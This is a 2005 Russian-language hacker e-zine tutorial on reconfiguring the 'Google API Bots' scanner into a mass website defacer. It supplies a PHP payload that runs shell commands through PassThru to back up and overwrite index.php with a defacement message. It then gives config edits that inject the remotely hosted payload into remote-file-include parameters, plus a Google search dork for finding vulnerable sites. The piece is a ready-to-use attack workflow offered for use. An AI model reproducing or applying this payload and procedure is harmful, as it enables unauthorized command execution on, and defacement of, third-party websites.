Все уже наверное знакомы с творением usun'a "Google API Bots". Они были созданы для поиска include bug, так вот, при желании usun bots могут выступать в роли масс дефейсеров тоже. Для этого нам понадобится notepad и hands.

Приступим... Берём наш божественный текстовый редактор и пишем:

<? " ;$cmd = 'cp index.php _index.php;echo We hack this shit!>index.php'; PassThru($cmd) ; echo ""; echo "php shell by 31337 supermegammgewhowehaksor" ?>

Сохраняем, в нашем случае под именем php.txt.
Наш дефейс будет выглядить как

"We hack this shit!"
Если вы не поставили ботов, то бегом их качать:
http://test.at.tut.by/MessengerGoogleBots_v.1.3.zip
и ставить, в Installation.txt и других всё написано, правда не на русском, но нечего Promt в руки и вперёд =)

Надеюсь поставили, api key зарегали на http://api.google.com/.

Теперь нужно их переделать не просто в ботов, а в масс дефейсеров. Это совсем легко.

Просто открываем:

patch_to_bots\WEB-INF\config\tasks\googlebots\includes\ filenameinparameter\include\CheckCustomResponseSettings.properties.
Находим:
>>#Flag that indicates whether it's necessary to save 'good' HTTP responses. >>result.save.flag=false
меняем на:
>>#Flag that indicates whether it's necessary to save 'good' HTTP responses. >>result.save.flag=true
можно и не менять, но тогда вам прийдётся все сайты на которых побывал бот, то есть good.dat, самим просматривать, а так миррор у вас сразу на винте.

Потом... находим:

>>#Replace string for URL pattern to check custom content availability. >>url.replace=*************
и пишем путь к нащему php.txt, перед этим естественно нужно зарегать себе сайт и залить туда этот заветный файлик, так что бегом на narod.ru. В нашем случае http://bottest.amillo.net/php.txt.

Всё у нас есть, нужно теперь поставить точки над "И".

Ищем всё в том же файле:

>>#Regular expression to check whether HTTP response contains some custom content. >>result.regular.expression=*****
меняем на:
>>#Regular expression to check whether HTTP response contains some custom content. >>result.regular.expression=supermegammgewhowehaksor.
Остальное можно не трогать. Это самое "supermegammgewhowehaksor" взялось не случайно, мы его прописывале в нашем php.txt, по этой строке оно будет сверять уязвим ли сайт.

Фууух, переделали, ну наконец.... Запускаем и вводим inurl:"*index*?file=*.htm" или что-то подобное и смотрим... Через время боты заканчиваю работать, а мы наслаждаемся результатом.

Вот и всё.

Автор: DRE /28.01.05/ ©

Mazafaka.Ru - E-Zine - 2005 ©